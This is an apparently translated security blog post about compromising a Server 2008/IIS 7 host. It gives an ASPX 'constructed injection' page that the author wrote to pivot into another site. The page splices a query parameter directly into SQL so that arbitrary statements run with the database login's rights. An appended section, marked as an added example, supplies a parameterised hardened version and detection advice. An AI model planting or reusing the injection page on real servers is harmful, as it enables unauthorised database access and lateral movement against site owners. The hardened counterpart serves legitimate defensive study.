Yesterday 4z1 and I looked at a site. Privilege escalation was really hard; we spent a full 5 hours on it with no result. Server 2008 + IIS 7, no sa, no root, none of the usual services...
We did end up using an ASPX constructed-injection page to cross over to another site; I found a pile of code online and none of it worked.
It's not much code, so I just wrote one myself. Annoying as hell.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影aspx构造注射专用页面</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="C#" runat="server">
void Page_Init(object sender, EventArgs e)
{
    // The connection string comes from web.config; "连接名" is the name of the <connectionStrings> entry.
    string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;

    // The parameter arrives as ?xxser=1
    string i = this.Page.Request.Params["xxser"];

    using (System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(cs))
    {
        conn.Open();

        // Deliberate: the parameter is concatenated straight into the SQL text, which is the whole
        // point of this page. Whatever is passed in ?xxser runs with the rights of the web.config login.
        System.Data.SqlClient.SqlCommand command =
            new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);

        // ExecuteNonQuery returns the affected-row count for INSERT/UPDATE/DELETE and -1 for a SELECT.
        int x = command.ExecuteNonQuery();

        Response.Write(i + "\n");
        Response.Write(x);
    }
}
</script>
</div>
</form>
</body>
</html>
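For contrast, here is the hardened counterpart of that page: the same ?xxser parameter and the same table/column placeholders, but the value is validated and bound as a SqlParameter instead of being concatenated into the SQL text, so the request can no longer change the statement. This is an added example written for this page, not code from the post or its author; the connection name "连接名", table [表] and column 列名 are kept as the same placeholders the post uses, and the column is assumed to be an integer.

```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>Parameterised lookup (hardened counterpart, added example)</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="C#" runat="server">
void Page_Init(object sender, EventArgs e)
{
    // Same query-string parameter as the post's page (?xxser=1), but it is never
    // spliced into SQL. The column is assumed to be an integer, so anything that
    // is not a plain integer is rejected before the database is touched.
    string raw = Request.Params["xxser"];
    int id;
    if (!int.TryParse(raw, out id))
    {
        Response.StatusCode = 400;
        Response.Write("bad request");
        return;
    }

    // "连接名" is the placeholder connection name from the post's web.config.
    string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;

    using (SqlConnection conn = new SqlConnection(cs))
    using (SqlCommand cmd = new SqlCommand("select count(*) from [表] where 列名 = @id", conn))
    {
        // Typed parameter: the value travels separately from the SQL text, so
        // "1; <anything>" or "1 or 1=1" can never become part of the statement.
        cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;

        conn.Open();
        int rows = (int)cmd.ExecuteScalar();

        // Echo the input HTML-encoded so the page does not become a reflected XSS sink.
        Response.Write(HttpUtility.HtmlEncode(raw) + "\n");
        Response.Write(rows);
    }
}
</script>
</div>
</form>
</body>
</html>
```

Two things worth noting from the post itself: the injection page only works because the login in web.config has enough rights to run whatever is passed in, so the parameterised version should also run under a login restricted to the one table it reads; and a request like `?xxser=1;...` hitting an .aspx page that normally receives only integers is exactly the kind of pattern worth alerting on in IIS logs.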